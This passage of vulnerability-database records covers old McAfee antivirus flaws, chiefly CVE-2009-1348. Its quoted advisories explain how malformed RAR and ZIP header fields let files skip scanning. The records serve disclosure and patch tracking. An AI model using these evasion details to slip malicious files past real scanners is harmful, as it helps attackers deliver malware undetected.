"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"cpe_match": [
{
"cpe22Uri": "cpe:/a:mcafee:active_virus_defense",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/a:mcafee:active_virusscan",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/a:mcafee:email_gateway",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/a:mcafee:internet_security_suite",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/a:mcafee:securityshield_for_email_servers",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/a:mcafee:securityshield_for_microsoft_sharepoint",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/a:mcafee:securityshield_for_microsoft_isa_server",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/a:mcafee:total_protection_for_endpoint",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/a:mcafee:virusscan_commandline",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/a:mcafee:virusscan_enterprise",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/a:mcafee:virusscan_plus",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/a:mcafee:virusscan_usb",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/a:mcafee:total_protection",
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2009-004587"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Thierry Zoller and Mickael Roger",
"sources": [
{
"db": "BID",
"id": "34780"
},
{
"db": "CNNVD",
"id": "CNNVD-200904-560"
}
],
"trust": 0.9
},
"cve": "CVE-2009-1348",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"accessComplexity": "HIGH",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "nvd@nist.gov",
"availabilityImpact": "COMPLETE",
"baseScore": 7.6,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 4.9,
"id": "CVE-2009-1348",
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"severity": "HIGH",
"trust": 1.8,
"vectorString": "AV:N/AC:H/Au:N/C:C/I:C/A:C",
"version": "2.0"
},
{
"accessComplexity": "HIGH",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "VULHUB",
"availabilityImpact": "COMPLETE",
"baseScore": 7.6,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 4.9,
"id": "VHN-38794",
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"severity": "HIGH",
"trust": 0.1,
"vectorString": "AV:N/AC:H/AU:N/C:C/I:C/A:C",
"version": "2.0"
}
],
"cvssV3": [],
"severity": [
{
"author": "nvd@nist.gov",
"id": "CVE-2009-1348",
"trust": 1.0,
"value": "HIGH"
},
{
"author": "NVD",
"id": "CVE-2009-1348",
"trust": 0.8,
"value": "High"
},
{
"author": "CNNVD",
"id": "CNNVD-200904-560",
"trust": 0.6,
"value": "HIGH"
},
{
"author": "VULHUB",
"id": "VHN-38794",
"trust": 0.1,
"value": "HIGH"
}
]
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-38794"
},
{
"db": "JVNDB",
"id": "JVNDB-2009-004587"
},
{
"db": "CNNVD",
"id": "CNNVD-200904-560"
},
{
"db": "NVD",
"id": "CVE-2009-1348"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "The AV engine before DAT 5600 in McAfee VirusScan, Total Protection, Internet Security, SecurityShield for Microsoft ISA Server, Security for Microsoft Sharepoint, Security for Email Servers, Email Gateway, and Active Virus Defense allows remote attackers to bypass virus detection via (1) an invalid Headflags field in a malformed RAR archive, (2) an invalid Packsize field in a malformed RAR archive, or (3) an invalid Filelength field in a malformed ZIP archive. Multiple McAfee products are prone to a vulnerability that may allow certain compressed archives to bypass the scan engine. \nSuccessful exploits will allow attackers to distribute files containing malicious code that the antivirus application will fail to detect. \nThe issue affects all McAfee software that uses DAT files. ----------------------------------------------------------------------\n\nSecunia is pleased to announce the release of the annual Secunia\nreport for 2008. \n\nHighlights from the 2008 report:\n * Vulnerability Research\n * Software Inspection Results\n * Secunia Research Highlights\n * Secunia Advisory Statistics\n\nRequest the full 2008 Report here:\nhttp://secunia.com/advisories/try_vi/request_2008_report/\n\nStay Secure,\n\nSecunia\n\n\n----------------------------------------------------------------------\n\nTITLE:\nMcAfee Products Archive Handling Security Bypass\n\nSECUNIA ADVISORY ID:\nSA34949\n\nVERIFY ADVISORY:\nhttp://secunia.com/advisories/34949/\n\nDESCRIPTION:\nSome weaknesses have been reported in various McAfee products, which\ncan be exploited by malware to bypass the scanning functionality. \n\nThe weaknesses are caused due to errors in the handling of archive\nfile formats (e.g. \n\nSOLUTION:\nUpdate .DAT files to DAT 5600 or later. \nhttp://www.mcafee.com/apps/downloads/security_updates/dat.asp\n\nPROVIDED AND/OR DISCOVERED BY:\n* Thierry Zoller\n* The vendor also credits Mickael Roger. \n\nORIGINAL ADVISORY:\nMcAfee:\nhttps://kc.mcafee.com/corporate/index?page=content\u0026id=SB10001\u0026actp=LIST_RECENT\n\nThierry Zoller:\nhttp://blog.zoller.lu/2009/04/mcafee-multiple-bypassesevasions-ziprar.html\n\n----------------------------------------------------------------------\n\nAbout:\nThis Advisory was delivered by Secunia as a free service to help\neverybody keeping their systems up to date against the latest\nvulnerabilities. \n\nSubscribe:\nhttp://secunia.com/advisories/secunia_security_advisories/\n\nDefinitions: (Criticality, Where etc.)\nhttp://secunia.com/advisories/about_secunia_advisories/\n\n\nPlease Note:\nSecunia recommends that you verify all advisories you receive by\nclicking the link. \nSecunia NEVER sends attached files with advisories. \nSecunia does not advise people to install third party patches, only\nuse those supplied by the vendor. \n\n----------------------------------------------------------------------\n\nUnsubscribe: Secunia Security Advisories\nhttp://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org\n\n----------------------------------------------------------------------\n\n\n. ________________________________________________________________________\n\nFrom the low-hanging-fruit-department - Mcafee multiple generic evasions\n________________________________________________________________________\n\nRelease mode: Coordinated but limited disclosure. \nRef : TZO-182009 - Mcafee multiple generic evasions\nWWW : http://blog.zoller.lu/2009/04/mcafee-multiple-bypassesevasions-ziprar.html\nVendor : http://www.mcafee.com\nStatus : Patched\nCVE : CVE-2009-1348 (provided by mcafee)\nhttps://kc.mcafee.com/corporate/index?page=content\u0026id=SB10001\u0026actp=LIST_RECENT\n\nSecurity notification reaction rating : very good\nNotification to patch window : +-27 days (Eastern holidays in between)\n\nDisclosure Policy : \nhttp://blog.zoller.lu/2008/09/notification-and-disclosure-policy.html\n\nAffected products : \n- McAfee VirusScan\\xae Plus 2009\n- McAfee Total Protection\\x99 2009\n- McAfee Internet Security\n- McAfee VirusScan USB\n- McAfee VirusScan Enterprise\n- McAfee VirusScan Enterprise Linux\n- McAfee VirusScan Enterprise for SAP\n- McAfee VirusScan Enterprise for Storage\n- McAfee VirusScan Commandline\n- Mcafee SecurityShield for Microsoft ISA Server\n- Mcafee Security for Microsoft Sharepoint\n- Mcafee Security for Email Servers\n- McAfee Email Gateyway\n- McAfee Total Protection for Endpoint\n- McAfee Active Virus Defense\n- McAfee Active VirusScan\n \nIt is unkown whether SaaS were affected (tough likely) :\n- McAfee Email Security Service\n- McAfee Total Protection Service Advanced\n\n\nI. Background\n~~~~~~~~~~~~~\nQuote: \"McAfee proactively secures systems and networks from known \nand as yet undiscovered threats worldwide. Home users, businesses, \nservice providers, government agencies, and our partners all trust \nour unmatched security expertise and have confidence in our \ncomprehensive and proven solutions to effectively block attacks\nand prevent disruptions.\"\n\n\nII. Description\n~~~~~~~~~~~~~~~\nThe parsing engine can be bypassed by a specially crafted and formated\nRAR (Headflags and Packsize),ZIP (Filelenght) archive. \n\nIII. Impact\n~~~~~~~~~~~\nA general description of the impact and nature of AV Bypasses/evasions\ncan be read at : \nhttp://blog.zoller.lu/2009/04/case-for-av-bypassesevasions.html\n\nThe bug results in denying the engine the possibility to inspect\ncode within RAR and ZIP archives. There is no inspection of the content\nat all and hence the impossibility to detect malicious code. \n\n\nIV. Disclosure timeline\n~~~~~~~~~~~~~~~~~~~~~~~~~\nDD/MM/YYYY\n04/04/2009 : Send proof of concept RAR I, description the terms under which \n I cooperate and the planned disclosure date\n \n06/04/2009 : Send proof of concept RAR II, description the terms under which \n I cooperate and the planned disclosure date\n \n06/04/2009 : Mcafee acknowledges receipt and reproduction of RAR I, ack\n acknowledges receipt of RARII \n \n10/04/2009 : Send proof of concept ZIP I, description the terms under which \n I cooperate and the planned disclosure date\n\n21/04/2009 : Mcafee provides CVE number CVE-2009-1348 \n \n28/04/2009 : Mcafee informs me that the patch might be released on the 29th\n29/04/2009 : Mcafee confirms patch release and provides URL\n https://kc.mcafee.com/corporate/index?page=content\u0026id=SB10001\u0026actp=LIST_RECENT\n \n29/04/2009 : Ask for affected versions\n\n29/04/2009 : Mcafee replies \" This issue does affect all vs engine products, including \n both gateway and endpoint\"\n\n\n\n\n\n_______________________________________________\nFull-Disclosure - We believe in it. \nCharter: http://lists.grok.org.uk/full-disclosure-charter.html\nHosted and sponsored by Secunia - http://secunia.com/. Description\n~~~~~~~~~~~~~~~\nImproper parsing of the PDF structure leads to evasion of detection of \nmalicious PDF documents at scantime and runtime. \n \nThis has been tested with several malicious PDF files and represents\na generic evasion of all PDF signatures and heuristics. \n\nGeneral information about evasion/bypasses can be found at :\nhttp://blog.zoller.lu/2009/04/case-for-av-bypassesevasions.html\n\nIII. Impact\n~~~~~~~~~~~\nKnown PDF exploits/malware may evade signature detection, 0day exploits\nmay evade heuristics. Disclosure timeline\n~~~~~~~~~~~~~~~~~~~~~~~~~\nDD.MM.YYYY\n01.06.2009 - Reported \n20.10.2009 - McAfee informed us that they published the advisory on their website\n\u003c waiting for others vendors to patch \u003e\n27.10.2009 - G-SEC releases this advisory\n\nAbout G-SEC\n~~~~~~~~~~~\nG-SEC\\x99 is a vendor independent luxemburgish led IT security consulting\ngroup. More information available at : http://www.g-sec.lu/\n\n\n\n\n\n\n\n\n\n\n\n\n_______________________________________________\nFull-Disclosure - We believe in it. ----------------------------------------------------------------------\n\nDo you have VARM strategy implemented?\n\n(Vulnerability Assessment Remediation Management) \n\nIf not, then implement it through the most reliable vulnerability\nintelligence source on the market. \n\nImplement it through Secunia",
"sources": [
{
"db": "NVD",
"id": "CVE-2009-1348"
},
{
"db": "JVNDB",
"id": "JVNDB-2009-004587"
},
{
"db": "BID",
"id": "36848"
},
{
"db": "BID",
"id": "34780"
},
{
"db": "VULHUB",
"id": "VHN-38794"
},
{
"db": "PACKETSTORM",
"id": "77183"
},
{
"db": "PACKETSTORM",
"id": "77170"
},
{
"db": "PACKETSTORM",
"id": "82292"
},
{
"db": "PACKETSTORM",
"id": "82334"
}
],
"trust": 2.61
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2009-1348",
"trust": 3.1
},
{
"db": "MCAFEE",
"id": "SB10001",
"trust": 2.2
},
{
"db": "BID",
"id": "34780",
"trust": 2.0
},
{
"db": "SECUNIA",
"id": "34949",
"trust": 1.9
},
{
"db": "JVNDB",
"id": "JVNDB-2009-004587",
"trust": 0.8
},
{
"db": "BUGTRAQ",
"id": "20090501 [TZO-18-2009] MCAFEE MULTIPLE EVASIONS/BYPASSES (RAR, ZIP)",
"trust": 0.6
},
{
"db": "CNNVD",
"id": "CNNVD-200904-560",
"trust": 0.6
},
{
"db": "MCAFEE",
"id": "SB10003",
"trust": 0.5
},
{
"db": "BID",
"id": "36848",
"trust": 0.4
},
{
"db": "SECUNIA",
"id": "37179",
"trust": 0.2
},
{
"db": "VULHUB",
"id": "VHN-38794",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "77183",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "77170",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "82292",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "82334",
"trust": 0.1
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-38794"
},
{
"db": "BID",
"id": "36848"
},
{
"db": "BID",
"id": "34780"
},
{
"db": "JVNDB",
"id": "JVNDB-2009-004587"
},
{
"db": "PACKETSTORM",
"id": "77183"
},
{
"db": "PACKETSTORM",
"id": "77170"
},
{
"db": "PACKETSTORM",
"id": "82292"
},
{
"db": "PACKETSTORM",
"id": "82334"
},
{
"db": "CNNVD",
"id": "CNNVD-200904-560"
},
{
"db": "NVD",
"id": "CVE-2009-1348"
}
]
},
"id": "VAR-200904-0511",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VULHUB",
"id": "VHN-38794"
}
],
"trust": 0.01
},
"last_update_date": "2024-11-23T22:09:03.525000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "SB10001",
"trust": 0.8,
"url": "https://kc.mcafee.com/corporate/index?page=content\u0026id=SB10001\u0026actp=LIST_RECENT"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2009-004587"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-20",
"trust": 1.9
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-38794"
},
{
"db": "JVNDB",
"id": "JVNDB-2009-004587"
},
{
"db": "NVD",
"id": "CVE-2009-1348"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.2,
"url": "http://blog.zoller.lu/2009/04/mcafee-multiple-bypassesevasions-ziprar.html"
},
{
"trust": 2.1,
"url": "https://kc.mcafee.com/corporate/index?page=content\u0026id=sb10001\u0026actp=list_recent"
},
{
"trust": 1.7,
"url": "http://www.securityfocus.com/bid/34780"
},
{
"trust": 1.7,
"url": "http://secunia.com/advisories/34949"
},
{
"trust": 1.1,
"url": "http://www.securityfocus.com/archive/1/503173/100/0/threaded"
},
{
"trust": 0.8,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2009-1348"
},
{
"trust": 0.8,
"url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2009-1348"
},
{
"trust": 0.6,
"url": "http://www.mcafee.com/"
},
{
"trust": 0.6,
"url": "http://www.securityfocus.com/archive/1/archive/1/503173/100/0/threaded"
},
{
"trust": 0.5,
"url": "http://www.g-sec.lu/mcafee-pdf-bypass.html"
},
{
"trust": 0.5,
"url": "https://kc.mcafee.com/corporate/index?page=content\u0026id=sb10003"
},
{
"trust": 0.3,
"url": "/archive/1/503173"
},
{
"trust": 0.2,
"url": "http://www.mcafee.com/apps/downloads/security_updates/dat.asp"
},
{
"trust": 0.2,
"url": "http://secunia.com/advisories/about_secunia_advisories/"
},
{
"trust": 0.2,
"url": "http://secunia.com/advisories/secunia_security_advisories/"
},
{
"trust": 0.2,
"url": "http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org"
},
{
"trust": 0.2,
"url": "http://www.mcafee.com"
},
{
"trust": 0.2,
"url": "http://blog.zoller.lu/2009/04/case-for-av-bypassesevasions.html"
},
{
"trust": 0.2,
"url": "http://secunia.com/"
},
{
"trust": 0.2,
"url": "http://lists.grok.org.uk/full-disclosure-charter.html"
},
{
"trust": 0.1,
"url": "https://kc.mcafee.com/corporate/index?page=content\u0026amp;id=sb10001\u0026amp;actp=list_recent"
},
{
"trust": 0.1,
"url": "http://secunia.com/advisories/34949/"
},
{
"trust": 0.1,
"url": "http://secunia.com/advisories/try_vi/request_2008_report/"
},
{
"trust": 0.1,
"url": "http://blog.zoller.lu/2008/09/notification-and-disclosure-policy.html"
},
{
"trust": 0.1,
"url": "http://www.g-sec.lu/"
},
{
"trust": 0.1,
"url": "http://secunia.com/advisories/37179/"
},
{
"trust": 0.1,
"url": "http://secunia.com/advisories/business_solutions/"
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-38794"
},
{
"db": "BID",
"id": "36848"
},
{
"db": "BID",
"id": "34780"
},
{
"db": "JVNDB",
"id": "JVNDB-2009-004587"
},
{
"db": "PACKETSTORM",
"id": "77183"
},
{
"db": "PACKETSTORM",
"id": "77170"
},
{
"db": "PACKETSTORM",
"id": "82292"
},
{
"db": "PACKETSTORM",
"id": "82334"
},
{
"db": "CNNVD",
"id": "CNNVD-200904-560"
},
{
"db": "NVD",
"id": "CVE-2009-1348"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "VULHUB",
"id": "VHN-38794"
},
{
"db": "BID",
"id": "36848"
},
{
"db": "BID",
"id": "34780"
},
{
"db": "JVNDB",
"id": "JVNDB-2009-004587"
},
{
"db": "PACKETSTORM",
"id": "77183"
},
{
"db": "PACKETSTORM",
"id": "77170"
},
{
"db": "PACKETSTORM",
"id": "82292"
},
{
"db": "PACKETSTORM",
"id": "82334"
},
{
"db": "CNNVD",
"id": "CNNVD-200904-560"
},
{
"db": "NVD",
"id": "CVE-2009-1348"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2009-04-30T00:00:00",
"db": "VULHUB",
"id": "VHN-38794"
},
{
"date": "2009-10-27T00:00:00",
"db": "BID",
"id": "36848"
},
{
"date": "2009-04-30T00:00:00",
"db": "BID",
"id": "34780"
},
{
"date": "2012-09-25T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2009-004587"
},
{
"date": "2009-05-02T05:21:02",
"db": "PACKETSTORM",
"id": "77183"
},
{
"date": "2009-05-01T02:03:00",
"db": "PACKETSTORM",
"id": "77170"
},
{
"date": "2009-10-28T01:02:31",
"db": "PACKETSTORM",
"id": "82292"
},
{
"date": "2009-10-28T15:59:53",
"db": "PACKETSTORM",
"id": "82334"
},
{
"date": "2009-04-30T00:00:00",
"db": "CNNVD",
"id": "CNNVD-200904-560"
},
{
"date": "2009-04-30T20:30:00.467000",
"db": "NVD",
"id": "CVE-2009-1348"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2018-10-10T00:00:00",
"db": "VULHUB",
"id": "VHN-38794"
},
{
"date": "2015-03-19T09:04:00",
"db": "BID",
"id": "36848"
},
{
"date": "2009-05-01T22:46:00",
"db": "BID",
"id": "34780"
},
{
"date": "2012-09-25T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2009-004587"
},
{
"date": "2009-05-19T00:00:00",
"db": "CNNVD",
"id": "CNNVD-200904-560"
},
{
"date": "2024-11-21T01:02:15.190000",
"db": "NVD",
"id": "CVE-2009-1348"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "network",
"sources": [
{
"db": "BID",
"id": "36848"
},
{
"db": "BID",
"id": "34780"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "McAfee VirusScan Used in products such as AV Vulnerabilities that can be avoided in the engine",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2009-004587"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "input validation",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-200904-560"
}
],
"trust": 0.6
}
}
cve-2000-1128
Vulnerability from cvelistv5
Published
2000-12-19 05:00
Modified
2024-08-08 05:45
Severity ?
EPSS score ?
Summary
The default configuration of McAfee VirusScan 4.5 does not quote the ImagePath variable, which improperly sets the search path and allows local users to place a Trojan horse "common.exe" program in the C:\Program Files directory.
References
| ▼ | URL | Tags |
|---|---|---|
| http://www.securityfocus.com/bid/1920 | vdb-entry, x_refsource_BID | |
| http://archives.neohapsis.com/archives/ntbugtraq/2000-q4/0073.html | mailing-list, x_refsource_NTBUGTRAQ |
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-08T05:45:37.299Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"name": "1920",
"tags": [
"vdb-entry",
"x_refsource_BID",
"x_transferred"
],
"url": "http://www.securityfocus.com/bid/1920"
},
{
"name": "20001103 Elevation of Privileges Exploit with McAfee VirusScan 4.5",
"tags": [
"mailing-list",
"x_refsource_NTBUGTRAQ",
"x_transferred"
],
"url": "http://archives.neohapsis.com/archives/ntbugtraq/2000-q4/0073.html"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "n/a",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "n/a"
}
]
}
],
"datePublic": "2000-11-03T00:00:00",
"descriptions": [
{
"lang": "en",
"value": "The default configuration of McAfee VirusScan 4.5 does not quote the ImagePath variable, which improperly sets the search path and allows local users to place a Trojan horse \"common.exe\" program in the C:\\Program Files directory."
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "n/a",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2005-11-02T10:00:00",
"orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"shortName": "mitre"
},
"references": [
{
"name": "1920",
"tags": [
"vdb-entry",
"x_refsource_BID"
],
"url": "http://www.securityfocus.com/bid/1920"
},
{
"name": "20001103 Elevation of Privileges Exploit with McAfee VirusScan 4.5",
"tags": [
"mailing-list",
"x_refsource_NTBUGTRAQ"
],
"url": "http://archives.neohapsis.com/archives/ntbugtraq/2000-q4/0073.html"
}
],
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "cve@mitre.org",
"ID": "CVE-2000-1128",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "n/a",
"version": {
"version_data": [
{
"version_value": "n/a"
}
]
}
}
]
},
"vendor_name": "n/a"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "The default configuration of McAfee VirusScan 4.5 does not quote the ImagePath variable, which improperly sets the search path and allows local users to place a Trojan horse \"common.exe\" program in the C:\\Program Files directory."
}
]
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "n/a"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "1920",
"refsource": "BID",
"url": "http://www.securityfocus.com/bid/1920"
},
{
"name": "20001103 Elevation of Privileges Exploit with McAfee VirusScan 4.5",
"refsource": "NTBUGTRAQ",
"url": "http://archives.neohapsis.com/archives/ntbugtraq/2000-q4/0073.html"
}
]
}
}
}
},
"cveMetadata": {
"assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"assignerShortName": "mitre",
"cveId": "CVE-2000-1128",
"datePublished": "2000-12-19T05:00:00",
"dateReserved": "2000-12-14T00:00:00",
"dateUpdated": "2024-08-08T05:45:37.299Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
cve-2000-0119
Vulnerability from cvelistv5
Published
2000-02-08 05:00
Modified
2024-08-08 05:05
Severity ?
EPSS score ?
Summary
The default configurations for McAfee Virus Scan and Norton Anti-Virus virus checkers do not check files in the RECYCLED folder that is used by the Windows Recycle Bin utility, which allows attackers to store malicious code without detection.
References
| ▼ | URL | Tags |
|---|---|---|
| http://marc.info/?l=bugtraq&m=94936267131123&w=2 | mailing-list, x_refsource_BUGTRAQ |
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-08T05:05:53.975Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"name": "20000130 Bypass Virus Checking",
"tags": [
"mailing-list",
"x_refsource_BUGTRAQ",
"x_transferred"
],
"url": "http://marc.info/?l=bugtraq\u0026m=94936267131123\u0026w=2"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "n/a",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "n/a"
}
]
}
],
"datePublic": "2000-01-30T00:00:00",
"descriptions": [
{
"lang": "en",
"value": "The default configurations for McAfee Virus Scan and Norton Anti-Virus virus checkers do not check files in the RECYCLED folder that is used by the Windows Recycle Bin utility, which allows attackers to store malicious code without detection."
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "n/a",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2016-10-17T13:57:01",
"orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"shortName": "mitre"
},
"references": [
{
"name": "20000130 Bypass Virus Checking",
"tags": [
"mailing-list",
"x_refsource_BUGTRAQ"
],
"url": "http://marc.info/?l=bugtraq\u0026m=94936267131123\u0026w=2"
}
],
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "cve@mitre.org",
"ID": "CVE-2000-0119",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "n/a",
"version": {
"version_data": [
{
"version_value": "n/a"
}
]
}
}
]
},
"vendor_name": "n/a"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "The default configurations for McAfee Virus Scan and Norton Anti-Virus virus checkers do not check files in the RECYCLED folder that is used by the Windows Recycle Bin utility, which allows attackers to store malicious code without detection."
}
]
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "n/a"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "20000130 Bypass Virus Checking",
"refsource": "BUGTRAQ",
"url": "http://marc.info/?l=bugtraq\u0026m=94936267131123\u0026w=2"
}
]
}
}
}
},
"cveMetadata": {
"assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"assignerShortName": "mitre",
"cveId": "CVE-2000-0119",
"datePublished": "2000-02-08T05:00:00",
"dateReserved": "2000-02-08T00:00:00",
"dateUpdated": "2024-08-08T05:05:53.975Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
cve-2000-0502
Vulnerability from cvelistv5
Published
2003-04-02 05:00
Modified
2024-08-08 05:21
Severity ?
EPSS score ?
Summary
Mcafee VirusScan 4.03 does not properly restrict access to the alert text file before it is sent to the Central Alert Server, which allows local users to modify alerts in an arbitrary fashion.
References
| ▼ | URL | Tags |
|---|---|---|
| https://exchange.xforce.ibmcloud.com/vulnerabilities/4641 | vdb-entry, x_refsource_XF | |
| http://archives.neohapsis.com/archives/bugtraq/2000-06/0038.html | mailing-list, x_refsource_BUGTRAQ | |
| http://www.osvdb.org/6287 | vdb-entry, x_refsource_OSVDB | |
| http://www.securityfocus.com/bid/1326 | vdb-entry, x_refsource_BID |
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-08T05:21:30.581Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"name": "mcafee-alerting-dos(4641)",
"tags": [
"vdb-entry",
"x_refsource_XF",
"x_transferred"
],
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/4641"
},
{
"name": "20000607 Mcafee Alerting DOS vulnerability",
"tags": [
"mailing-list",
"x_refsource_BUGTRAQ",
"x_transferred"
],
"url": "http://archives.neohapsis.com/archives/bugtraq/2000-06/0038.html"
},
{
"name": "6287",
"tags": [
"vdb-entry",
"x_refsource_OSVDB",
